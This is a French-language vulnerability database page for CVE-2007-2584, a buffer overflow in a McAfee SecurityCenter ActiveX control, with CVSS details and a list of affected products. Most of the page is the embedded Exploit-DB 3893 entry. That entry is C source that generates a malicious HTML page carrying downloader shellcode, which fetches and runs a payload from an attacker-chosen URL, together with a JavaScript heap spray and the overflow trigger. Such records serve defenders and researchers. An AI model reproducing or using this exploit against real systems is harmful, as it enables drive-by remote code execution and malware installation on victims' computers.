CVE-2007-2584 : Détail


20h00 +00:00
10h57 +00:00
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Descriptions du CVE

Buffer overflow in the IsOldAppInstalled function in the McSubMgr.McSubMgr Subscription Manager ActiveX control (MCSUBMGR.DLL) in McAfee SecurityCenter before 6.0.25 and 7.x before 7.2.147 allows remote attackers to execute arbitrary code via a crafted argument.

Informations du CVE


Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]


EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3893

Date de publication : 2007-05-09 22h00 +00:00
Auteur : Jambalaya
EDB Vérifié : Yes

/* McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability Peel the frame from axis,Thanks Test on Windows2000 and dll version Mcsubmgr.dll Greetz to OYXin, sowhat, Winny Thomas and 0x557 team */ #include <stdio.h> #include <stdlib.h> #include <string.h> FILE *fp = NULL; char *file = "McAfee_exploit.html"; char *url = NULL; //Downloader shellcode unsigned char sc[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x3c\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x34\x99\x99\x99\xC3\x12\x6B\xAA" "\x59\x35\xA4\x01\x99\x99\x99\xEC\x6F\x18\x75\x51\x99\x99\x99\x12" "\x6D\x10\xCF\xBD\x71\x0C\x99\x99\x99\xAA\x42\x10\x9F\x66\xAF\xF1" "\x17\xD7\x97\x75\x71\x34\x99\x99\x99\x10\xDF\x91\xF1\xF5\xF5\x99" "\x99\xF1\xF6\xF7\xB7\xFD\xF1\xEC\xEB\xF5\xF4\xCD\x66\xCF\x91\x10" "\xDF\x9D\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x11\x99\x99\x99\x10\xDF" "\x95\x66\xAF\xF1\x01\x67\x13\x97\x71\xE0\x99\x99\x99\x10\xDF\x8D" "\x66\xAF\xF1\xBC\x29\x66\x5B\x71\xF3\x99\x99\x99\x10\xDF\x81\x66" "\xEF\x9D\xF1\xAF\x83\xB6\xE9\x71\xC3\x99\x99\x99\x10\xDF\x89\xF3" "\xFC\xF1\xEA\xB7\xFC\xE1\x10\xFF\x85\x66\xEF\x85\x66\xCF\x81\xAA" "\x50\xC8\xC8\x66\xEF\x85\x66\xEF\xBD\xC8\x66\xCF\x89\xAA\x50\xC8" "\x66\xEF\x85\x66\xCF\x8D\x66\xCF\x95\x70\x19\x99\x99\x99\xCC\xCF" "\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12\xE9\x85" "\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99\x99\x12" "\x5C\xC7\xC4\x5B\x9D\x99\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC" "\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A\x44\x7A" "\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3\x5D\xED" "\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3" "\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A" "\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99\x71\x50" "\x67\x66\x66"; unsigned char sc_2[] = "\x98"; char * header = "<!-- McAfee exploit:) Jambalaya-->\n\n" "<html>\n" "<object classid=\"clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602\" id='target'></object>\n" "<body>\n" "<SCRIPT language=\"javascript\">\n" "\tvar heapSprayToAddress = 0x05050505;\n" "\tvar shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n"; char * footer = "\n" "var heapBlockSize = 0x400000;\n" "var payLoadSize = shellcode.length * 2;\n" "var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n" "var spraySlide = unescape(\"%u0505%u0505\");\n" "spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n" "heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\n" "memory = new Array();\n\n" "for (i=0;i<heapBlocks;i++)\n{\n" "\t\tmemory[i] = spraySlide + shellcode;\n}\n" "var padding = String.fromCharCode(0x05);\n" "while( padding.length< 500)\n" "{\npadding +=padding;\n}\n" "var str = padding.substring(0,500);\n" "var arg2=\"defaultV\";\n" "target.IsOldAppInstalled(str, arg2);\n" "function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t" "while (spraySlide.length*2<spraySlideSize)\n\t" "{\n\t\tspraySlide += spraySlide;\n\t}\n" "\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n" "</script>\n"; char * trigger_1 = "</body>\n" "</html>\n"; // print unicode shellcode void PrintPayLoad(char *lpBuff, int buffsize) { int i; for(i=0;i<buffsize;i+=2) { if((i%16)==0) { if(i!=0) { printf("\"\n\""); fprintf(fp, "%s", "\" +\n\""); } else { printf("\""); fprintf(fp, "%s", "\""); } } printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]); fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]); } printf("\";\n"); fprintf(fp, "%s", "\");\n"); fflush(fp); } void main(int argc, char **argv) { unsigned char buf[1024] = {0}; int sc_len = 0; int n; if (argc < 2) { printf("#######################################\n"); printf("#\tMcAfee Security Center IsOldAppInstalled exploit by Jambalaya:>\n"); printf("#\ttest on Windows2000 and dll version Mcsubmgr.dll>\n"); printf("#\tReference :\n"); printf("#\t100%% successful\? who knows\;\)\n"); printf("\r\nUsage: %s <URL> [htmlfile]\n", argv[0]); printf("\r\nE.g.: %s exploit.html\r\n\n", argv[0]); exit(1); } url = argv[1]; if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) { printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); return; } printf("[+] download url:%s\n", url); if(argc >=3) file = argv[2]; printf("[+] exploit file:%s\n", file); fp = fopen(file, "w"); if(!fp) { printf("[-] Open file error!\n"); return; } //build evil html file fprintf(fp, "%s", header); fflush(fp); memset(buf, 0, sizeof(buf)); sc_len = sizeof(sc)-1; memcpy(buf, sc, sc_len); memcpy(buf+sc_len, url, strlen(url)); sc_len += strlen(url); memcpy(buf+sc_len, sc_2, 1); sc_len += 1; PrintPayLoad((char *)buf, sc_len); fprintf(fp, "%s", footer); fflush(fp); fprintf(fp, "%s", trigger_1); fflush(fp); printf("[+] exploit write to %s success!\n", file); } // [2007-05-10]

Products Mentioned

Configuraton 0

Mcafee>>Security_center >> Version 4.3

Mcafee>>Security_center >> Version 6.0

Mcafee>>Security_center >> Version 6.0.22

Mcafee>>Security_center >> Version 7.0

Mcafee>>Security_center >> Version 7.1

Mcafee>>Security_center >> Version 7.2

Mcafee>>Securitycenter_agent >> Version 6.0

Mcafee>>Virusscan >> Version 10.0.27

Mcafee>>Virusscan >> Version 2004

    Mcafee>>Virusscan >> Version 2005

      Tags : vdb-entry, x_refsource_SECTRACK
      Tags : vdb-entry, x_refsource_BID
      Tags : third-party-advisory, x_refsource_IDEFENSE
      Tags : vdb-entry, x_refsource_OSVDB
      Tags : third-party-advisory, x_refsource_SECUNIA
      Tags : vdb-entry, x_refsource_VUPEN
      Tags : vdb-entry, x_refsource_BID